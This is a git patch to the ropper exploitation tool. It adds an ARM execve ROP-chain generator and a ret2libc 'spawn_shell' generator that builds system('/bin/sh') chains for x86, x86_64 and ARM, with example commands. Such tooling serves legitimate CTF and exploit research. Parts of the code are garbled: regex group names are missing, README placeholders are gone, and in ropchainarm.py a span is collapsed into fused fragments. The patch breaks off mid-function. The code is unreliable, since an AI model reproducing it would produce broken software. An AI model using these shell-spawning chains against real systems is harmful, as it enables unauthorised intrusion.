From a602167c587aebb5303834f30c31dbe344f84d76 Mon Sep 17 00:00:00 2001 From: Robbie Date: Wed, 3 Jun 2026 07:29:25 +0300 Subject: [PATCH] Add ARM execve chain support and a ret2libc spawn_shell generator ARM --chain execve: ArchitectureArm previously raised "does not have support for execve chain generation". This adds ARM gadget categories (pop/ldm pop-pc LOAD_REG, WRITE_MEM, LOAD_MEM, SYSCALL) and the svc 0 SYS ending, plus a generator that discovers terminal pop-pc / ldm dispatch gadgets, fills r0/r1/r2/r7 with a re-loading-aware register cover planner, writes the command into .data, and emits clearly-labelled placeholders when a gadget (svc 0, an r0 pop, ...) is missing. New --chain spawn_shell for x86, x86_64 and ARM: a ret2libc system("/bin/sh") generator emitting the correct per-arch calling convention -- x86 cdecl (stack arg), x86_64 System V (rdi + a movaps stack-alignment ret), ARM AAPCS (r0 + pc dispatch). Options: cmd (default /bin/sh, any path), address (libc system), string (&cmd), align (x86_64). system() resolution: address= > a system symbol defined in the binary (rebased) > verified system@plt > import hint > placeholder. _findPltStub disassembles .plt/.plt.sec/.plt.got and returns the stub whose indirect jump provably dereferences system's GOT slot (x86_64 jmp [rip+disp], x86 jmp [abs], ARM add ip,pc,#imm[,#rot] ; ... ; ldr pc,[ip,#imm]!), verified against the relocation, so it never emits a silently-wrong address; x86 PIE jmp [ebx+off] and stripped PLTs fall back to the hint. "/bin/sh" resolution: string= > an existing copy already in the binary (no write) > write the string into a writable scratch section, .bss preferred, via write-what-where gadgets > placeholder. _findWritableSection reads ELF section headers directly (SHF_WRITE|SHF_ALLOC, not TLS, sh_size >= needed) so writability and free space are verified natively; it avoids getSection('.bss') because .bss is SHT_NOBITS (raw is None, size comes from sh_size). 
Correctness fixes: - The scratch-buffer pointer was double-imageBase-subtracted (pointer != written bytes); it now uses the same rebase_N(offset) convention as the write. - x86_64 _paddingNeededFor's ^pop (...)$ regex dropped pop r8/pop r9 (2-char regs), under-padding chains; broadened to \w{2,3} (also hardens execve/mprotect). - _useBinaryForRebase registers the binary with the gadgets' own (fileName, section) identity, so a later gadget registration reuses the entry instead of emitting a duplicate IMAGE_BASE. - The written string is always NUL-terminated: the shared _nulTerminateAndPad appends the NUL unconditionally before word-aligning (ARM previously skipped it for cmd lengths that were a multiple of 4). Help text (--help epilog in options.py, README.md, interactive ropchain help in console.py) lists spawn_shell, the .bss write and cmd=, and marks execve as ARM-capable. Tests: testcases/test_chain_arm.py and testcases/test_chain_spawn_shell.py; full suite 58/58. Co-Authored-By: Claude Opus 4.8 (1M context) --- README.md | 3 +- ropper/arch.py | 25 +- ropper/console.py | 4 +- ropper/options.py | 3 +- ropper/ropchain/arch/__init__.py | 1 + ropper/ropchain/arch/ropchainarm.py | 569 +++++++++++++++++++++++++ ropper/ropchain/arch/ropchainx86.py | 81 +++- ropper/ropchain/arch/ropchainx86_64.py | 87 +++- ropper/ropchain/ropchain.py | 388 +++++++++++++++++ testcases/test_chain_arm.py | 56 +++ testcases/test_chain_spawn_shell.py | 342 +++++++++++++++ 11 files changed, 1552 insertions(+), 7 deletions(-) create mode 100644 ropper/ropchain/arch/ropchainarm.py create mode 100644 testcases/test_chain_arm.py create mode 100644 testcases/test_chain_spawn_shell.py diff --git a/README.md b/README.md index b8c4db5..000a29a 100644 --- a/README.md +++ b/README.md @@ -117,7 +117,8 @@ Usage SPARC [SPARC64] available rop chain generators: - execve (execve[=], default /bin/sh) [Linux x86, x86_64] + execve (execve[=], default /bin/sh) [Linux x86, x86_64, ARM] + spawn_shell (spawn_shell[ 
cmd=<path>][ address=<addr>]), ret2libc system, writes cmd to .bss if absent [Linux x86, x86_64, ARM] mprotect (mprotect=<address>
:<size>) [Linux x86, x86_64] virtualprotect (virtualprotect=<address iat vp>
:) [Windows x86] diff --git a/ropper/arch.py b/ropper/arch.py index 70a7b4f..275e3eb 100644 --- a/ropper/arch.py +++ b/ropper/arch.py @@ -389,11 +389,33 @@ def _initGadgets(self): super(ArchitectureArm, self)._initGadgets() self._endings[gadget.GadgetType.ROP] = [(b"[\x00-\xff][\x80-\xff][\x10-\x1e\x30-\x3e\x50-\x5e\x70-\x7e\x90-\x9e\xb0-\xbe\xd0-\xde\xf0-\xfe][\xe8\xe9]", 4), # pop {[reg]*,pc}, ldm [reg], {*,pc} (b"\x04\xf0\x9d\xe4", 4) # pop {pc} - ] + ] self._endings[gadget.GadgetType.JOP] = [(b'[\x10-\x1e]\xff\x2f\xe1', 4), # bx (b'[\x30-\x3e]\xff\x2f\xe1', 4), # blx (b'[\x00-\x0f]\xf0\xa0\xe1', 4), # mov pc, (b'\x00\x80\xbd\xe8', 4)] # ldm sp! ,{pc} + self._endings[gadget.GadgetType.SYS] = [(b'\x00\x00\x00\xef', 4)] # svc 0 + + def _initCategories(self): + # Minimal categories needed for the execve ropchain generator. + # LOAD_REG matches only single-instruction multi-register pops that + # write pc (the gadget's own dispatch). `dst` captures the entire + # register list as text; the chain generator parses it. + self._categories = { + gadget.Category.LOAD_REG : ( + (r'^pop \{(?P[^}]*\bpc)\}$', + r'^ldm(?:ia|fd)? sp!, \{(?P[^}]*\bpc)\}$'), + ('push','bl','blx','b ','bx','svc','str')), + gadget.Category.WRITE_MEM : ( + (r'^str (?P\w{2,4}), \[(?P\w{2,4})\]$',), + ('push','bl','blx','b ','bx','svc')), + gadget.Category.LOAD_MEM : ( + (r'^ldr (?P\w{2,4}), \[(?P\w{2,4})\]$',), + ('push','bl','blx','b ','bx','svc','str')), + gadget.Category.SYSCALL : ( + (r'^svc #?0(?:x0+)?$',), + ('push','bl','blx','b ','bx')), + } class ArchitectureArmBE(ArchitectureArm): @@ -414,6 +436,7 @@ def _initEndianess(self, endianess): (b'\xe1\x2f\xff[\x30-\x3e]', 4), # blx (b'\xe1\xa0\xf0[\x00-\x0f]', 4), # mov pc, (b'\xe8\xdb\x80\x01', 4)] # ldm sp! 
,{pc} + self._endings[gadget.GadgetType.SYS] = [(b'\xef\x00\x00\x00', 4)] # svc 0 class ArchitectureArmThumb(Architecture): diff --git a/ropper/console.py b/ropper/console.py index 1f75e78..ba943e5 100644 --- a/ropper/console.py +++ b/ropper/console.py @@ -450,6 +450,8 @@ def __printExamples(self): {0} --file /bin/ls --type jop {0} --file /bin/ls --chain execve {0} --file /bin/ls --chain "execve cmd=/bin/sh" --badbytes 000a0d + {0} --file /bin/ls --chain spawn_shell + {0} --file /bin/ls --chain "spawn_shell address=0xf7c4d3e0" {0} --file /bin/ls --chain "mprotect address=0xbfdff000 size=0x21000" {0} --file /bin/ls /lib/libc.so.6 --console @@ -932,7 +934,7 @@ def do_ropchain(self, text): def help_ropchain(self): self.__printHelpText('ropchain [ argname=arg[ argname=arg...]]', - 'uses the given generator and create a ropchain with args\n\nAvailable generators:\nexecve\nargs: cmd (optional)\navailable: x86, x86_64\nOS: linux\n\nmprotect\nargs: address, size\navailable: x86, x86_64\nOS: linux\n\nvirtualprotect\nargs: address (IAT)(optional)\navailable: x86\nOS: Windows\n\nExamples:\nropchain execve\nropchain mprotect address=0xbfff0000 size=0x21000') + 'uses the given generator and create a ropchain with args\n\nAvailable generators:\nexecve\nargs: cmd (optional), address (optional)\navailable: x86, x86_64, ARM\nOS: linux\n\nspawn_shell\ncalls libc system(cmd), default cmd /bin/sh (ret2libc); writes cmd into .bss when it is not already present in the binary\nargs: cmd (optional path), address (libc system, optional), string (&cmd, optional)\navailable: x86, x86_64, ARM\nOS: linux\n\nmprotect\nargs: address, size\navailable: x86, x86_64\nOS: linux\n\nvirtualprotect\nargs: address (IAT)(optional)\navailable: x86\nOS: Windows\n\nExamples:\nropchain execve\nropchain spawn_shell\nropchain spawn_shell address=0xf7c4d3e0\nropchain mprotect address=0xbfff0000 size=0x21000') def do_quit(self, text): exit(0) diff --git a/ropper/options.py b/ropper/options.py index 
95ce36b..d51ec0e 100644 --- a/ropper/options.py +++ b/ropper/options.py @@ -69,7 +69,8 @@ def _createArgParser(self): SPARC [SPARC64] available rop chain generators: - execve (execve[=], default /bin/sh) [Linux x86, x86_64] + execve (execve[=], default /bin/sh) [Linux x86, x86_64, ARM] + spawn_shell (spawn_shell[ cmd=][ address=]), ret2libc system, writes cmd to .bss if absent [Linux x86, x86_64, ARM] mprotect (mprotect address=0xdeadbeef size=0x10000) [Linux x86, x86_64] virtualprotect (virtualprotect address=0xdeadbeef) [Windows x86] """) diff --git a/ropper/ropchain/arch/__init__.py b/ropper/ropchain/arch/__init__.py index 2d01abe..50d244e 100644 --- a/ropper/ropchain/arch/__init__.py +++ b/ropper/ropchain/arch/__init__.py @@ -27,3 +27,4 @@ # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. from ropper.ropchain.arch.ropchainx86 import * from ropper.ropchain.arch.ropchainx86_64 import * +from ropper.ropchain.arch.ropchainarm import * diff --git a/ropper/ropchain/arch/ropchainarm.py b/ropper/ropchain/arch/ropchainarm.py new file mode 100644 index 0000000..10d8c6f --- /dev/null +++ b/ropper/ropchain/arch/ropchainarm.py @@ -0,0 +1,569 @@ +# coding=utf-8 +# Copyright 2018 Sascha Schirra +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# 1. Redistributions of source code must retain the above copyright notice, this +# list of conditions and the following disclaimer. +# +# 2. Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# +# 3. Neither the name of the copyright holder nor the names of its contributors +# may be used to endorse or promote products derived from this software without +# specific prior written permission. 
+# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +from ropper.gadget import Category, Gadget +from ropper.common.error import * +from ropper.common.utils import * +from ropper.rop import Ropper +from ropper.arch import ARM +from ropper.ropchain.ropchain import * +from ropper.loaders.loader import Type +from ropper.loaders.elf import ELF +from ropper.loaders.raw import Raw +import re +import sys + +if sys.version_info.major == 2: + range = xrange + + +_ARM_ALIASES = {'sb': 9, 'sl': 10, 'fp': 11, 'ip': 12, 'sp': 13, 'lr': 14, 'pc': 15} + +# Matches a single-instruction pop-pc terminator. The `dst` group captures +# the complete brace-delimited register list as text; the chain generator +# parses it into a sorted list of register names. +_POP_LAST_LINE_RE = re.compile(r'^(?:pop|ldm(?:ia|fd)? sp!,)\s*\{([^}]*\bpc)\}$') + +# Mnemonics whose first arg is read (not written). Used to exclude false +# positives from the conservative "register clobber" analysis. 
+_READS_FIRST_ARG = frozenset(( + 'str', 'strb', 'strh', 'strd', 'strex', 'strexb', 'strexh', + 'stm', 'stmia', 'stmib', 'stmda', 'stmdb', 'stmfd', 'stmea', 'push', + 'cmp', 'cmn', 'tst', 'teq', + 'b', 'bl', 'blx', 'bx', 'svc', 'swi', + 'msr', 'nop', 'dmb', 'dsb', 'isb', +)) + +_FIRST_REG_RE = re.compile( + r'^[a-z]+\s+\{?(r1[0-5]|r\d|sb|sl|fp|ip|sp|lr|pc)\b') + +# Whitelist of mnemonics safe to appear before a gadget's terminal pop-pc. +# We exclude all forms of store (memory writes that could trash the chain +# itself), all branches, all svc/swi, all coprocessor ops, all conditionals, +# and anything that writes to sp/pc. Everything in this set is unconditional +# and either pure-register or pure-load. +_SAFE_NONTERMINAL_MNEMS = frozenset(( + 'mov', 'mvn', 'movs', 'mvns', 'mrs', + 'add', 'sub', 'rsb', 'adc', 'sbc', 'rsc', + 'adds', 'subs', 'rsbs', 'adcs', 'sbcs', 'rscs', + 'and', 'orr', 'eor', 'bic', + 'ands', 'orrs', 'eors', 'bics', + 'lsl', 'lsr', 'asr', 'ror', 'rrx', + 'lsls', 'lsrs', 'asrs', 'rors', 'rrxs', + 'mul', 'mla', 'mls', 'muls', 'mlas', + 'umull', 'smull', 'umlal', 'smlal', + 'cmp', 'cmn', 'tst', 'teq', + 'sxtb', 'sxth', 'uxtb', 'uxth', 'sxtab', 'sxtah', 'uxtab', 'uxtah', + 'rev', 'rev16', 'revsh', 'rbit', 'clz', + 'nop', + 'ldr', 'ldrb', 'ldrh', +)) + + +def _isUsableChainGadget(gadget): + """Return True if `gadget` is safe to chain. 
A usable gadget: + * ends in a clean pop-pc (terminator pop set must not include sp) + * every non-terminal instruction's mnemonic is in the small safe-list + (no memory writes, no branches, no svc, no conditionals, no sp/pc writes) + """ + if not _popPcMatch(gadget): + return False + if 'sp' in _popPcRegs(gadget): + return False # mid-chain stack pivot + for line in gadget.lines[:-1]: + text, mnem = line[1], line[2] + if mnem not in _SAFE_NONTERMINAL_MNEMS: + return False + m = _FIRST_REG_RE.match(text) + if m and m.group(1) in ('sp', 'pc'): + return False + return True + + +def _reg_index(reg): + """Canonical numeric index for an ARM register name. + + ARM's pop/ldm always loads registers in ascending numeric order regardless of + how they're written in the assembly source, so this index is also the stack + slot the register receives its value from. + """ + if reg in _ARM_ALIASES: + return _ARM_ALIASES[reg] + if reg.startswith('r') and reg[1:].isdigit(): + return int(reg[1:]) + return -1 + + +def _popPcMatch(gadget): + if not gadget.lines: + return None + return _POP_LAST_LINE_RE.match(gadget.lines[-1][1]) + + +def _popPcRegs(gadget): + """Registers loaded by the gadget's terminal pop-pc, in stack-slot order.""" + m = _popPcMatch(gadget) + if not m: + return [] + regs = [r.strip() for r in m.group(1).split(',')] + return sorted(regs, key=_reg_index) + + +def _clobberedRegs(gadget): + """Conservative set of registers the gadget destroys. Includes the + terminal pop set plus any register that appears as the first (written) + operand of an earlier instruction.""" + regs = _bodyClobberedRegs(gadget) + regs.update(_popPcRegs(gadget)) + regs.discard('pc') + return regs + + +def _bodyClobberedRegs(gadget): + """Registers destroyed by gadget *body* instructions (not the terminal pop). + These clobbers are unrecoverable — the body writes whatever value its + semantics dictate, so we cannot supply the new value from the chain. 
+ A reg in this set, if already loaded with a target value, is lost.""" + regs = set() + for line in gadget.lines[:-1]: + text, mnem = line[1], line[2] + if mnem in _READS_FIRST_ARG: + continue + m = _FIRST_REG_RE.match(text) + if m: + regs.add(m.group(1)) + return regs + + +class RopChainARM(RopChain): + """Base class for ARM (32-bit, EABI) ROP-chain generators.""" + + MAX_QUALI = 7 + + @classmethod + def name(cls): + return '' + + @classmethod + def availableGenerators(cls): + return [RopChainARMExecve, RopChainARMSpawnShell] + + @classmethod + def archs(cls): + return [ARM] + + def _packFmt(self): + return "' len(best_cov): + best, best_cov = g, cov + if not best: + missing = ', '.join(sorted(remaining)) + self._printMessage( + 'Cannot find pop gadget for: %s - emitting placeholder.' % missing) + text += '# TODO: load %s manually - no pop gadget found that\n' % missing + text += '# covers them without body-clobbering loaded targets: %s\n' % ( + ', '.join(sorted(loaded)) or '(none)') + break + self._updateUsedBinaries(best) + # values_for() already re-supplies every popped reg that is in + # `targets`, so previously-loaded targets keep their values. + text += self._printPopGadget(best, values_for(_popPcRegs(best))) + remaining -= best_cov + return text + + def create(self, options=None): + options = options or {} + cmd = options.get('cmd') or '/bin/sh' + address = options.get('address') + + if len(cmd.split(' ')) > 1: + raise RopChainError('No argument support for execve commands') + + self._printMessage('ROPchain Generator for syscall execve on ARM (Linux EABI):') + self._printMessage('\nload registers:') + self._printMessage(' r0 = pointer to cmd string') + self._printMessage(' r1 = 0 (argv = NULL)') + self._printMessage(' r2 = 0 (envp = NULL)') + self._printMessage(' r7 = 11 (NR_execve)') + self._printMessage('then: svc 0') + + chain_body = '\n' + cmd_address_str = None + + if address is None: + # Try to write `cmd` into .data and use that address for r0. 
+ try: + section = self._binaries[0].getSection('.data') + cmdaddress = section.offset + write_text = self._writeCommandToDataSection(cmd, cmdaddress) + chain_body += write_text + # The write path will have added the str gadget's binary to + # _usedBinaries. Its rebase idx is what we need to address + # the freshly-written cmd buffer. + for i, (fname, _sec) in enumerate(self._usedBinaries): + if fname == self._binaries[0].fileName: + cmd_address_str = self._printRebasedAddress(toHex(cmdaddress, 4), idx=i) + break + cmd_addr_value = cmdaddress + except RopChainError as e: + self._printMessage('Cannot synthesize cmd-write gadget: %s' % e) + self._printMessage('Using 0x41414141 as cmd address - please replace.') + cmd_addr_value = 0x41414141 + else: + cmd_addr_value = int(address, 16) if isinstance(address, str) else address + + targets = {'r0': cmd_addr_value, 'r1': 0, 'r2': 0, 'r7': 11} + chain_body += self._loadRegisters(targets, cmd_address_str=cmd_address_str) + + # svc 0 terminator. + svc = self._findSvc0() + if svc is not None: + idx = self._binaryIdx(svc) + chain_body += 'rop += rebase_%d(%s) # %s\n' % ( + idx, toHex(svc.lines[0][0], 4), svc.simpleString()) + else: + chain_body += '# INSERT SVC 0 GADGET HERE\n' + self._printMessage('No svc 0 gadget found!') + + chain = self._printHeader() + chain += self._printRebase() + chain += "rop = ''\n" + chain += chain_body + chain += 'print(rop)\n' + return chain + + +class RopChainARMSpawnShell(RopChainARM): + """Generate a ret2libc ``system('/bin/sh')`` chain for ARM (AAPCS). + + The first argument is passed in ``r0``; control reaches ``system()`` via + the ``pc`` slot of a terminal-pop dispatch gadget:: + + [ pop {r0, .., pc} ] (placeholder if no r0-popping gadget exists) + [ &"/bin/sh" ] -> r0 + [ padding... 
] -> any GP regs popped between r0 and pc + [ &system ] -> loaded into pc => branches to system() + + ``&system`` and ``&"/bin/sh"`` are resolved by the shared base helpers + (supplied address > in-binary symbol/write > placeholder).""" + + @classmethod + def usableTypes(cls): + return (ELF, Raw) + + @classmethod + def name(cls): + return 'spawn_shell' + + def create(self, options=None): + options = options or {} + cmd = options.get('cmd') or '/bin/sh' + address = options.get('address') + string = options.get('string') + + self._printMessage('ROPchain Generator for system() on ARM (ret2libc):') + self._printMessage(' r0 = pointer to cmd string, then branch to system()') + + defs = '' + body = '\n' + + binsh_line, binsh_defs, write_text = self._resolveBinshPointer(cmd, string) + defs += binsh_defs + body += write_text + + system_line, system_defs = self._resolveSystemAddress(address) + defs += system_defs + + # pop {r0, .., pc}: r0 <- &"/bin/sh", pc <- system() + pop = self._findPopGadget(['r0']) + if pop is not None: + body += self._printPopGadget(pop, {'r0': binsh_line}) + # The stack slot consumed by pc (after every popped GP register) + # is whatever we emit next, so system() lands in pc. 
+ body += system_line + else: + self._printMessage('No `pop {r0, .., pc}` gadget found; emitting placeholder.') + body += '# INSERT `pop {r0, pc}` GADGET HERE\n' + body += binsh_line + '# ^ value intended for r0\n' + body += system_line + '# ^ value intended for pc (system)\n' + + chain = self._printHeader() + chain += self._printRebase() + chain += defs + chain += "rop = ''\n" + chain += body + chain += 'print(rop)\n' + return chain diff --git a/ropper/ropchain/arch/ropchainx86.py b/ropper/ropchain/arch/ropchainx86.py index 132a3a8..ac64a2e 100644 --- a/ropper/ropchain/arch/ropchainx86.py +++ b/ropper/ropchain/arch/ropchainx86.py @@ -76,7 +76,7 @@ def name(cls): @classmethod def availableGenerators(cls): - return [RopChainX86System, RopChainX86Mprotect, RopChainX86VirtualProtect] + return [RopChainX86System, RopChainX86SpawnShell, RopChainX86Mprotect, RopChainX86VirtualProtect] @classmethod def archs(self): @@ -630,6 +630,14 @@ def _searchOpcode(self, opcode): else: raise RopChainError('Cannot create gadget for opcode: %s' % opcode) + def _addressWidth(self): + return 4 + + def _writeCmdToMemory(self, cmd, where): + # NUL-terminate + word-align so the writewhatwhere gadget emits whole + # words and the buffer is a valid C string. + return self._createWriteStringWhere(self._nulTerminateAndPad(cmd), where)[0] + def create(self): pass @@ -746,6 +754,77 @@ def create(self, options={}): return chain +class RopChainX86SpawnShell(RopChainX86): + """Generate a ret2libc ``system('/bin/sh')`` chain for x86 (cdecl). 
+ + cdecl passes arguments on the stack, so the call itself needs no + register-loading gadget; the chain is three words:: + + [ &system ] <- overwritten return address; system() runs + [ ret_after ] <- where system() returns (exit() / `ret` gadget / junk) + [ &"/bin/sh" ] <- system()'s first argument + + ``&system`` and ``&"/bin/sh"`` are resolved by the shared helpers in the + base class (supplied address > in-binary symbol/write > placeholder).""" + + @classmethod + def usableTypes(self): + return (ELF, Raw) + + @classmethod + def name(cls): + return 'spawn_shell' + + def _resolveReturnAddress(self): + """The address system() returns to. A resolvable exit() is cleanest; a + bare `ret` keeps the stack tidy; otherwise junk (the shell has already + spawned, so it rarely matters).""" + sym = self._findSymbolAddress('exit') + if sym is not None: + return self._rebaseLine(sym, 'return address: exit()') + try: + ret = self._searchOpcode('c3') + if ret: + idx = self._usedBinaries.index((ret.fileName, ret.section)) + return 'rop += rebase_%d(%s) # return address: ret\n' % (idx, toHex(ret.lines[0][0], 4)) + except RopChainError: + pass + return 'rop += p(0xdeadbeef) # return address (placeholder)\n' + + def create(self, options=None): + options = options or {} + cmd = options.get('cmd') or '/bin/sh' + address = options.get('address') # absolute libc system() + string = options.get('string') # absolute &"/bin/sh" + + self._printMessage('ROPchain Generator for system() on x86 (ret2libc):') + self._printMessage(' layout: [&system][ret][&cmd] (cdecl, arg on stack)') + + defs = '' + body = '\n' + + # Resolve the "/bin/sh" pointer first (it may inject a .data write that + # must run before the call). 
+ binsh_line, binsh_defs, write_text = self._resolveBinshPointer(cmd, string) + defs += binsh_defs + body += write_text + + system_line, system_defs = self._resolveSystemAddress(address) + defs += system_defs + + body += system_line + body += self._resolveReturnAddress() + body += binsh_line + + chain = self._printHeader() + chain += self._printRebase() + chain += defs + chain += "rop = ''\n" + chain += body + chain += 'print(rop)\n' + return chain + + class RopChainX86Mprotect(RopChainX86): """ Builds a ropchain for mprotect syscall diff --git a/ropper/ropchain/arch/ropchainx86_64.py b/ropper/ropchain/arch/ropchainx86_64.py index b6bd172..ef6ea72 100644 --- a/ropper/ropchain/arch/ropchainx86_64.py +++ b/ropper/ropchain/arch/ropchainx86_64.py @@ -76,7 +76,7 @@ def name(cls): @classmethod def availableGenerators(cls): - return [RopChainSystemX86_64, RopChainMprotectX86_64] + return [RopChainSystemX86_64, RopChainSpawnShellX86_64, RopChainMprotectX86_64] @classmethod def archs(self): @@ -166,7 +166,10 @@ def _paddingNeededFor(self, gadget): regs = [] for idx in range(1,len(gadget.lines)): line = gadget.lines[idx][1] - matched = match('^pop (...)$', line) + # 2-3 register chars so the extended regs r8/r9 are counted too + # (the old `(...)` matched exactly 3 chars and silently dropped + # `pop r8` / `pop r9`, under-padding the chain). + matched = match(r'^pop (\w{2,3})$', line) if matched: regs.append(matched.group(1)) return regs @@ -624,6 +627,14 @@ def _searchOpcode(self, opcode): else: raise RopChainError('Cannot create gadget for opcode: %s' % opcode) + def _addressWidth(self): + return 8 + + def _writeCmdToMemory(self, cmd, where): + # NUL-terminate + quad-word-align so the writewhatwhere gadget emits + # whole quad-words and the buffer is a valid C string. 
+ return self._createWriteStringWhere(self._nulTerminateAndPad(cmd), where)[0] + def create(self): pass @@ -735,6 +746,78 @@ def create(self, options): return chain +class RopChainSpawnShellX86_64(RopChainX86_64): + """Generate a ret2libc ``system('/bin/sh')`` chain for x86_64 (System V). + + The first integer argument goes in ``rdi``:: + + [ pop rdi ; ret ] (loads &"/bin/sh"; placeholder if absent) + [ &"/bin/sh" ] + [ ret ] <- 16-byte stack-alignment ret for glibc movaps + [ &system ] + + Modern glibc ``system()`` executes ``movaps`` against a 16-byte aligned + stack; the extra bare ``ret`` realigns it. Pass ``align=false`` to omit.""" + + @classmethod + def usableTypes(self): + return (ELF, Raw) + + @classmethod + def name(cls): + return 'spawn_shell' + + def create(self, options=None): + options = options or {} + cmd = options.get('cmd') or '/bin/sh' + address = options.get('address') + string = options.get('string') + align_opt = options.get('align') + align = True + if align_opt is not None: + align = str(align_opt).lower() not in ('0', 'false', 'no', 'off') + + self._printMessage('ROPchain Generator for system() on x86_64 (ret2libc):') + self._printMessage(' rdi = &"/bin/sh", then call system()') + + defs = '' + body = '\n' + + binsh_line, binsh_defs, write_text = self._resolveBinshPointer(cmd, string) + defs += binsh_defs + body += write_text + + # pop rdi ; ret -> rdi = &"/bin/sh" + pop_rdi = self._find(Category.LOAD_REG, reg='rdi') + if pop_rdi is not None: + body += self._printRopInstruction(pop_rdi, padding=True, value=binsh_line) + else: + self._printMessage('No `pop rdi ; ret` gadget found; emitting placeholder.') + body += '# INSERT `pop rdi ; ret` GADGET HERE\n' + body += binsh_line + + # Optional 16-byte stack alignment ret (glibc system() uses movaps). 
+ if align: + try: + body += '# 16-byte stack alignment for glibc system() (movaps):\n' + body += self._createOpcode('c3') + except RopChainError: + self._printMessage('No `ret` gadget for stack alignment; skipping.') + body += '# (no `ret` gadget found for alignment)\n' + + system_line, system_defs = self._resolveSystemAddress(address) + defs += system_defs + body += system_line + + chain = self._printHeader() + chain += self._printRebase() + chain += defs + chain += "rop = ''\n" + chain += body + chain += 'print(rop)\n' + return chain + + class RopChainMprotectX86_64(RopChainX86_64): """ Builds a ropchain for mprotect syscall diff --git a/ropper/ropchain/ropchain.py b/ropper/ropchain/ropchain.py index d4caa8f..d3a52df 100644 --- a/ropper/ropchain/ropchain.py +++ b/ropper/ropchain/ropchain.py @@ -27,6 +27,7 @@ # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. from ropper.common.abstract import * from ropper.common.error import * +from ropper.common.utils import * class RopChain(Abstract): @@ -110,3 +111,390 @@ def containsBadbytes(self, value, bytecount=4): def _printMessage(self, message): if self.__callback: self.__callback(message) + + # ------------------------------------------------------------------ + # Shared symbol / string resolution helpers. + # + # These are best-effort and defensive: they only work for ELF binaries + # whose inner filebytes object exposes sections/symbols/relocations, and + # they degrade to ``None`` for every other file type rather than raising. + # ret2libc generators (spawn_shell) use them to auto-resolve the address + # of ``system`` and a ``"/bin/sh"`` pointer where the binary makes that + # possible, falling back to clearly-labelled placeholders otherwise. + # ------------------------------------------------------------------ + def _findSymbolAddress(self, name): + """Return the virtual address of a *defined* symbol ``name`` from the + primary binary's ``.symtab``/``.dynsym``, or ``None``. 
+ + Only symbols that are actually defined inside this file are returned + (``st_value`` set and ``st_shndx`` not ``SHN_UNDEF``); imported + (undefined) symbols are reported via :meth:`_findImportGotSlot` + instead. This resolves e.g. libc ``system`` for statically linked or + non-stripped binaries.""" + binary = self._binaries[0] + inner = getattr(binary, '_binary', None) + sections = getattr(inner, 'sections', None) + if not sections: + return None + try: + for section in sections: + if getattr(section, 'name', '') in ('.symtab', '.dynsym'): + for sym in section.symbols: + if sym.name == name and sym.header.st_value and sym.header.st_shndx: + return sym.header.st_value + except BaseException: + return None + return None + + def _findImportGotSlot(self, name): + """Return the GOT slot virtual address for an imported symbol ``name`` + (the ``r_offset`` of its PLT/GOT relocation), or ``None``. + + This does not resolve the runtime address of the function (that lives + in a shared library), but the slot address is a useful hint and proves + the symbol is imported through the PLT.""" + binary = self._binaries[0] + inner = getattr(binary, '_binary', None) + sections = getattr(inner, 'sections', None) + if not sections: + return None + try: + for section in sections: + relocs = getattr(section, 'relocations', None) + if not relocs: + continue + for reloc in relocs: + sym = getattr(reloc, 'symbol', None) + if sym is not None and sym.name == name: + return reloc.header.r_offset + except BaseException: + return None + return None + + def _findPltStub(self, name): + """Return the virtual address of the PLT stub for the imported symbol + ``name`` (i.e. ``name@plt`` -- the address a ret2plt chain jumps to), or + ``None``. + + The stub is found by disassembling the binary's PLT sections and + locating the entry whose indirect jump *provably* dereferences + ``name``'s GOT slot. 
Because the match is verified against the actual + relocation target, this never returns a silently-wrong address: if the + layout cannot be parsed (stripped PLT, x86 PIE ``jmp [ebx+off]`` whose + GOT base is unknown at rest, unsupported arch) it returns ``None`` and + the caller falls back to a hint + placeholder.""" + got = self._findImportGotSlot(name) + if got is None: + return None + binary = self._binaries[0] + arch = getattr(binary, 'arch', None) + try: + from capstone import Cs, CS_OP_MEM, CS_OP_IMM, CS_ARCH_ARM + md = Cs(arch._arch, arch._mode) + md.detail = True + except BaseException: + return None + + sections = [] + for sname in ('.plt.sec', '.plt', '.plt.got'): + try: + sections.append(binary.getSection(sname)) + except BaseException: + pass + if not sections: + return None + + is_arm = (arch._arch == CS_ARCH_ARM) + for section in sections: + try: + code = bytes(bytearray(section.bytes)) + if is_arm: + stub = self._scanPltArm(md, code, section.virtualAddress, got, CS_OP_MEM, CS_OP_IMM) + else: + stub = self._scanPltX86(md, code, section.virtualAddress, got, CS_OP_MEM) + except BaseException: + stub = None + if stub is not None: + return stub + return None + + def _scanPltX86(self, md, code, base, got, CS_OP_MEM): + """Find an x86/x86_64 PLT entry whose ``jmp [mem]`` targets ``got``. 
